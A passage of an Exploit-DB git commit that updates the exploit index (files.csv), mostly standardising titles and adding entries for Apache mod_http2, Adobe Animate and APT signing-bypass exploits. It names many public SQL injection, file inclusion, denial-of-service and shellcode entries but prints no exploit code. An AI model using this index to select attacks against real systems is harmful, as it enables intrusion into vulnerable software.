From 32e86030d5f132fe8343c5307798c5d77875296f Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Thu, 15 Dec 2016 13:07:17 +0000
Subject: [PATCH] DB: 2016-12-15

3 new exploits

minix 3.1.2a - tty panic Local Denial of Service
minix 3.1.2a - tty panic Remote Denial of Service
Minix 3.1.2a - tty panic Local Denial of Service
Minix 3.1.2a - tty panic Remote Denial of Service

Microsoft IIS 5.0 - WebDav Lock Method Memory Leak Denial of Service
Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service

MINIX 3.3.0 - Local Denial of Service (PoC)
Minix 3.3.0 - Local Denial of Service (PoC)

MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service
Minix 3.3.0 - Remote TCP/IP Stack Denial of Service

Apache 2.4.23 (mod_http2) - Denial of Service
Adobe Animate 15.2.1.95 - Memory Corruption

CoolPlayer - m3u File Local Buffer Overflow
CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow

Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)

Apache Tomcat (WebDAV) - Remote File Disclosure
Apache Tomcat - (WebDAV) Remote File Disclosure

Apache Tomcat (WebDAV) - Remote File Disclosure (SSL)
Apache Tomcat - (WebDAV) Remote File Disclosure (SSL)

APT - Repository Signing Bypass via Memory Allocation Failure

PHPFootball 1.6 - (show.php) Remote Database Disclosure
PHPFootball 1.6 - Remote Database Disclosure

Aprox CMS Engine 5 (1.0.4) - Local File Inclusion
Aprox CMS Engine 5.1.0.4 - Local File Inclusion

PHP Help Agent 1.1 - (content) Local File Inclusion
PHP Help Agent 1.1 - 'content' Parameter Local File Inclusion

Alstrasoft Affiliate Network Pro - (pgm) SQL Injection
Alstrasoft Affiliate Network Pro - 'pgm' Parameter SQL Injection

PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection
Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection
PHPHoo3 <= 5.2.6 - 'viewCat' Parameter SQL Injection
Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection

Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection
Aprox CMS Engine 5.(1.0.4) - 'index.php' SQL Injection
Siteframe - 'folder.php id' SQL Injection
PHPFootball 1.6 - (show.php) SQL Injection
DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection
HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection
Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection
Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection
Siteframe CMS 3.2.3 - 'folder.php' SQL Injection
PHPFootball 1.6 - SQL Injection
DigiLeave 1.2 - 'book_id' Parameter Blind SQL Injection
HRS Multi - 'key' Parameter Blind SQL Injection

MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection
MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection
MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection
EZWebAlbum (dlfilename) - Remote File Disclosure
Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection
ShopCartDx 4.30 - 'pid' SQL Injection
MojoPersonals - Blind SQL Injection
MojoJobs - Blind SQL Injection
MojoAuto - Blind SQL Injection
EZWebAlbum - Remote File Disclosure
Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection
ShopCartDx 4.30 - 'pid' Parameter SQL Injection

YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Pre Survey Poll - 'default.asp catid' SQL Injection
Atom Photoblog 1.1.5b1 - (photoId) SQL Injection
ibase 2.03 - 'download.php' Remote File Disclosure
YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting
Pre Survey Poll - 'catid' Parameter SQL Injection
Atom Photoblog 1.1.5b1 - 'photoId' Parameter SQL Injection
ibase 2.03 - Remote File Disclosure

Live Music Plus 1.1.0 - 'id' SQL Injection
xrms 1.99.2 - (Remote File Inclusion / Cross-Site Scripting / Information Gathering) Multiple Vulnerabilities
Live Music Plus 1.1.0 - 'id' Parameter SQL Injection
XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering

FizzMedia 1.51.2 - (comment.php mid) SQL Injection
PHPTest 0.6.3 - (picture.php image_id) SQL Injection
FizzMedia 1.51.2 - SQL Injection
PHPTest 0.6.3 - SQL Injection

Mobius 1.4.4.1 - (browse.php id) SQL Injection
EPShop < 3.0 - 'pid' SQL Injection
Mobius 1.4.4.1 - SQL Injection
EPShop < 3.0 - 'pid' Parameter SQL Injection

TriO 2.1 - (browse.php id) SQL Injection
CMScout 2.05 - (common.php bit) Local File Inclusion
Getacoder clone - (sb_protype) SQL Injection
GC Auction Platinum - (cate_id) SQL Injection
SiteAdmin CMS - (art) SQL Injection
TriO 2.1 - 'browse.php' SQL Injection
CMScout 2.05 - 'bit' Parameter Local File Inclusion
Getacoder clone - 'sb_protype' Parameter SQL Injection
GC Auction Platinum - 'cate_id' Parameter SQL Injection
SiteAdmin CMS - 'art' Parameter SQL Injection

Youtuber Clone - 'ugroups.php UID' SQL Injection
Youtuber Clone - SQL Injection

PixelPost 1.7.1 - (language_full) Local File Inclusion
PixelPost 1.7.1 - 'language_full' Parameter Local File Inclusion

ViArt Shop 3.5 - (category_id) SQL Injection
Minishowcase 09b136 - 'lang' Local File Inclusion
ViArt Shop 3.5 - 'category_id' Parameter SQL Injection
Minishowcase 09b136 - 'lang' Parameter Local File Inclusion

Gregarius 0.5.4 - rsargs[] SQL Injection
PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion
HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion
hiox browser Statistics 2.0 - Remote File Inclusion
Gregarius 0.5.4 - SQL Injection
PHP Hosting Directory 2.0 - Remote File Inclusion
HIOX Random Ad 1.3 - Remote File Inclusion
HIOX Browser Statistics 2.0 - Remote File Inclusion

nzFotolog 0.4.1 - (action_file) Local File Inclusion
ZeeReviews - 'comments.php ItemID' SQL Injection
nzFotolog 0.4.1 - 'action_file' Parameter Local File Inclusion
ZeeReviews - SQL Injection

Article Friendly Pro/Standard - (Cat) SQL Injection
Article Friendly Pro/Standard - SQL Injection

PozScripts Classified Ads Script - 'cid' SQL Injection
TubeGuru Video Sharing Script - (UID) SQL Injection
PozScripts Classified Ads Script - 'cid' Parameter SQL Injection
TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection

pligg 9.9.0 - (Cross-Site Scripting / Local File Inclusion / SQL Injection) Multiple Vulnerabilities
pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection

camera life 2.6.2b4 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting

Alstrasoft Article Manager Pro - (Authentication Bypass) SQL Injection
Alstrasoft Article Manager Pro 1.6 - Authentication Bypass

viart shopping cart 3.5 - Multiple Vulnerabilities
Viart shopping cart 3.5 - Multiple Vulnerabilities

PHPFootball 1.6 - (filter.php) Remote Hash Disclosure
PHPFootball 1.6 - Remote Hash Disclosure

talkback 2.3.14 - Multiple Vulnerabilities
Siteframe CMS 3.2.x - (SQL Injection / phpinfo()) Multiple Vulnerabilities
TalkBack 2.3.14 - Multiple Vulnerabilities
Siteframe CMS 3.2.x - SQL Injection / phpinfo()

CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
CMScout - Cross-Site Scripting / HTML Injection

ShopCartDx 4.30 - (products.php) Blind SQL Injection
ShopCartDx 4.30 - 'products.php' Blind SQL Injection

viart shop 4.0.5 - Multiple Vulnerabilities
ViArt Shop 4.0.5 - Multiple Vulnerabilities

Siteframe 3.2.3 - (user.php) SQL Injection
Siteframe CMS 3.2.3 - 'user.php' SQL Injection

viart shop 4.0.5 - Cross-Site Request Forgery
ViArt Shop 4.0.5 - Cross-Site Request Forgery

Siteframe 2.2.4 - search.php Cross-Site Scripting

Siteframe 2.2.4 - download.php Information Disclosure
Siteframe CMS 2.2.4 - 'download.php' Information Disclosure

phpx 3.2.3 - Multiple Vulnerabilities
PHPX 3.2.3 - Multiple Vulnerabilities

PHPX 3.x - admin/page.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - admin/news.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - admin/user.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - admin/images.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - admin/forums.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'page.php' Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'news.php' Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'user.php' Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'images.php' Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'forums.php' Cross-Site Request Forgery / Arbitrary Command Execution

Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion
Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion

Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter Cross-Site Scripting
Alstrasoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter Cross-Site Scripting
Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection
Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting
Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting
Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection

PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection
PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection
PHPX 3.5.15/3.5.16 - users.php user_id Parameter SQL Injection
PHPX 3.5.15/3.5.16 - news.php Multiple Parameter SQL Injection
PHPX 3.5.15/3.5.16 - gallery.php Multiple Parameter SQL Injection
PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection
PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection
PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection
PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection
PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection

XRms 1.99.2 - activities/some.php title Parameter Cross-Site Scripting
XRms 1.99.2 - companies/some.php company_name Parameter Cross-Site Scripting
XRms 1.99.2 - contacts/some.php last_name Parameter Cross-Site Scripting
XRms 1.99.2 - campaigns/some.php campaign_title Parameter Cross-Site Scripting
XRms 1.99.2 - opportunities/some.php opportunity_title Parameter Cross-Site Scripting
XRms 1.99.2 - cases/some.php case_title Parameter Cross-Site Scripting
XRms 1.99.2 - files/some.php file_id Parameter Cross-Site Scripting
XRms 1.99.2 - reports/custom/mileage.php starting Parameter Cross-Site Scripting
XRms 1.99.2 - 'title' Parameter Cross-Site Scripting
XRms 1.99.2 - 'company_name' Parameter Cross-Site Scripting
XRms 1.99.2 - 'last_name' Parameter Cross-Site Scripting
XRms 1.99.2 - 'campaign_title' Parameter Cross-Site Scripting
XRms 1.99.2 - 'opportunity_title' Parameter Cross-Site Scripting
XRms 1.99.2 - 'case_title' Parameter Cross-Site Scripting
XRms 1.99.2 - 'file_id' Parameter Cross-Site Scripting
XRms 1.99.2 - 'starting' Parameter Cross-Site Scripting

Pligg 1.0.4 - 'install1.php' Cross-Site Scripting

Joomla! Component DT Register - 'cat' SQL Injection
Joomla! Component DT Register - 'cat' Parameter SQL Injection
---
 files.csv                        | 189 ++++++++++++++++---------------
 platforms/linux/dos/40909.py     |  45 ++++++++
 platforms/linux/remote/40916.txt | 184 ++++++++++++++++++++++++++++++
 platforms/php/webapps/22384.txt  |  11 --
 platforms/php/webapps/34269.txt  |  11 --
 platforms/php/webapps/5975.txt   |   6 +-
 platforms/windows/dos/40915.txt  | 133 ++++++++++++++++++++++
 7 files changed, 460 insertions(+), 119 deletions(-)
 create mode 100755 platforms/linux/dos/40909.py
 create mode 100755 platforms/linux/remote/40916.txt
 delete mode 100755 platforms/php/webapps/22384.txt
 delete mode 100755 platforms/php/webapps/34269.txt
 create mode 100755 platforms/windows/dos/40915.txt

diff --git a/files.csv b/files.csv
index c2ea9558b..f8ccfe847 100644
--- a/files.csv
+++ b/files.csv
@@ -755,8 +755,8 @@ id,file,description,date,author,platform,type,port 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0 -6120,platforms/minix/dos/6120.txt,"minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 -6129,platforms/minix/dos/6129.txt,"minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 +6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0 +6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0 6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - (reboot) Remote Denial of Service",2008-08-03,crit3rion,hardware,dos,0 
@@ -2534,7 +2534,7 @@ id,file,description,date,author,platform,type,port 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router Denial of Service",2001-09-21,Sniffer,hardware,dos,0 20852,platforms/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",multiple,dos,0 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0 -20854,platforms/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDav Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos,0 +20854,platforms/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos,0 20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow (PoC)",2012-08-28,LiquidWorm,windows,dos,0 20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0 
@@ -4382,7 +4382,7 @@ id,file,description,date,author,platform,type,port 35162,platforms/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-01-01,d3c0der,windows,dos,0 35164,platforms/php/dos/35164.php,"PHP 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos,0 -35173,platforms/linux/dos/35173.txt,"MINIX 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0 +35173,platforms/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0 35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 
@@ -4391,7 +4391,7 @@ id,file,description,date,author,platform,type,port 35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial of Service",2011-01-19,"Craig Freyman",windows,dos,0 35279,platforms/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0 -35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 +35302,platforms/linux/dos/35302.c,"Minix 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337 35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0 35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 
@@ -5305,8 +5305,10 @@ id,file,description,date,author,platform,type,port 40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0 40905,platforms/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,windows,dos,0 40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0 +40909,platforms/linux/dos/40909.py,"Apache 2.4.23 (mod_http2) - Denial of Service",2016-12-12,"Jungun Baek",linux,dos,0 40910,platforms/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos,0 40914,platforms/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos,0 +40915,platforms/windows/dos/40915.txt,"Adobe Animate 15.2.1.95 - Memory Corruption",2016-12-14,hyp3rlinx,windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 
@@ -5878,7 +5880,7 @@ id,file,description,date,author,platform,type,port 6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0 6039,platforms/windows/local/6039.c,"Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow",2008-07-11,Shinnok,windows,local,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)",2008-07-21,"Guido Landi",windows,local,0 -6157,platforms/windows/local/6157.pl,"CoolPlayer - m3u File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local,0 +6157,platforms/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local,0 6188,platforms/windows/local/6188.c,"IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0 6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0 
@@ -6790,7 +6792,7 @@ id,file,description,date,author,platform,type,port 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,windows,local,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0 -40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0 +40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 
@@ -9517,13 +9519,13 @@ id,file,description,date,author,platform,type,port 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,linux,remote,0 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 -4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0 +4530,platforms/multiple/remote/4530.pl,"Apache Tomcat - (WebDAV) Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0 4533,platforms/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,linux,remote,4501 4534,platforms/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow",2007-10-15,mu-b,linux,remote,143 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow",2005-05-03,greuff,linux,remote,0 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow",2005-10-16,greuff,linux,remote,27015 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass",2007-10-16,ikki,linux,remote,0 -4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0 +4552,platforms/linux/remote/4552.pl,"Apache Tomcat - (WebDAV) Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0 4556,platforms/multiple/remote/4556.txt,"Litespeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow (Metasploit)",2007-10-24,ri0t,windows,remote,10616 4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File 
Disclosure",2007-10-24,kingcope,multiple,remote,0 @@ -15155,6 +15157,7 @@ id,file,description,date,author,platform,type,port 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0 40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0 40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0 +40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 
@@ -17184,7 +17187,7 @@ id,file,description,date,author,platform,type,port 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0 -3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 +3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,php,webapps,0 3227,platforms/php/webapps/3227.txt,"CascadianFAQ 4.1 - 'index.php' SQL Injection",2007-01-30,ajann,php,webapps,0 3228,platforms/php/webapps/3228.txt,"MyNews 4.2.2 - (themefunc.php) Remote File Inclusion",2007-01-30,GoLd_M,php,webapps,0 3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0 
@@ -18988,7 +18991,7 @@ id,file,description,date,author,platform,type,port 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 5882,platforms/php/webapps/5882.txt,"eNews 0.1 - 'delete.php' Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' Parameter SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 -5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 +5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5.1.0.4 - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 
@@ -19157,78 +19160,78 @@ id,file,description,date,author,platform,type,port 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection",2008-07-15,K-159,php,webapps,0 -6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 +6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - 'content' Parameter Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0 6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injections",2008-07-15,Mr.SQL,php,webapps,0 6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution",2008-07-16,Inphex,php,webapps,0 6086,platforms/php/webapps/6086.txt,"Joomla! 
